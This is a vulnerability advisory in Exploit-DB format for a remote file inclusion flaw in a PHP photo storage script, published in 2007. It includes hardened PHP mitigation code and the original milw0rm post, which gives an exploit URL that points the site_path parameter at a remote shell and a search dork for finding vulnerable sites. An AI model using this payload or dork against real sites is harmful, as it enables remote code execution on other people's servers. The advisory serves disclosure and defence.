Vendor: magic photo storage website
By: k1tk4t
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: magic photo storage website
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Published: 2007

magic photo storage website — Remote File Inclusion

The magic photo storage website is vulnerable to Remote File Inclusion (RFI). An attacker can exploit this vulnerability by supplying a malicious value in the _config[site_path] parameter of the common_function.php file, which the script concatenates into its require_once calls. This allows the attacker to include arbitrary remote files, potentially leading to remote code execution or sensitive data disclosure.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before including files. Additionally, it is important to keep the software up to date with the latest patches and security fixes.
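One way to implement that mitigation in the affected file, as an added example rather than the vendor's code: it assumes common_function.php sits in an include/ directory one level below the application root (as the exploit URL suggests), and the helper name secureRequire is hypothetical.

```php
<?php
// Added example (not the vendor's code): a hardened prologue for an include
// file such as common_function.php. The original fault was that
// $_config['site_path'] could be set from the request (this relies on the
// legacy register_globals setting being enabled), so require_once pulled in a
// remote URL. The fix is to never derive include paths from request data and
// to confine every include to a known directory.

declare(strict_types=1);

// 1. Derive the application root from the file system, not from the request.
//    Any value injected into $_config['site_path'] is overwritten here.
$_config = is_array($_config ?? null) ? $_config : [];
$_config['site_path'] = realpath(__DIR__ . '/..'); // assumed layout: include/ under the root
if ($_config['site_path'] === false) {
    http_response_code(500);
    exit('application root not found');
}

// 2. Include helper that accepts only a relative, wrapper-free path and
//    verifies the resolved file still lives under the application root.
function secureRequire(string $root, string $relative): void
{
    // Reject anything that looks like a stream wrapper or an absolute path
    // (http://, ftp://, php://, data:, C:\, /etc/passwd, //server/share ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:|^[\\\\/]#i', $relative)) {
        throw new RuntimeException("refused include: $relative");
    }
    // realpath() returns false for a missing file and collapses any "../".
    $target     = realpath($root . '/' . $relative);
    $rootPrefix = rtrim($root, '/\\') . DIRECTORY_SEPARATOR;
    if ($target === false || strncmp($target, $rootPrefix, strlen($rootPrefix)) !== 0) {
        throw new RuntimeException("refused include: $relative");
    }
    require_once $target;
}

// 3. The three includes from the advisory, now routed through the guard.
secureRequire($_config['site_path'], 'class/session.class.php');
secureRequire($_config['site_path'], 'class/validator.class.php');
secureRequire($_config['site_path'], 'include/message.php');
```

Pair this with allow_url_include=Off (and register_globals=Off on the old PHP versions that still have it) in php.ini so that a stray include path can never resolve to a remote URL.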

Exploit-DB raw data:

########################################################################
# magic photo storage website -- Remote File Inclusion
# Vendor         : http://www.scriptaty.net/magic-photo-storage-website.html
# Demo Site      : http://www.turnkeydemos.info/demo/picstorage/
# Found By       : k1tk4t - k1tk4t[4t]newhack.org
# Location       : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
file;
common_function.php

bug;
require_once $_config['site_path'] . '/class/session.class.php';
require_once $_config['site_path'] . '/class/validator.class.php';
require_once $_config['site_path'] . '/include/message.php';
########################################################################
exploit;
http://localhost/include/common_function.php?_config[site_path]=http://shell
########################################################################
Dork;
allinurl:catalog_login.php
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,fusion
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#asiahacker [all member asiahacker community]
#nyubicrew [all member solpotcrew community] <-- at irc.komp-uter.org

# milw0rm.com [2007-01-08]